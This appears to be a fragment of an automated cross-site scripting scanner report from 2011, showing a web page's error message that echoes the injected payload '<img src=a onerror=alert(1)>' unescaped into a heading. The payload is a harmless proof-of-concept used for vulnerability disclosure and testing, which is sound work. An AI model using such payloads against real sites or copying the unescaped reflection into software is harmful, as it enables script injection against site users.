<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -164e3c<img src=a onerror=alert(1)>c220e7f3ec0 cannot be converted to a number. </h1>
...[SNIP]...
Report generated by XSS.CX at Wed Mar 16 20:47:21 CDT 2011.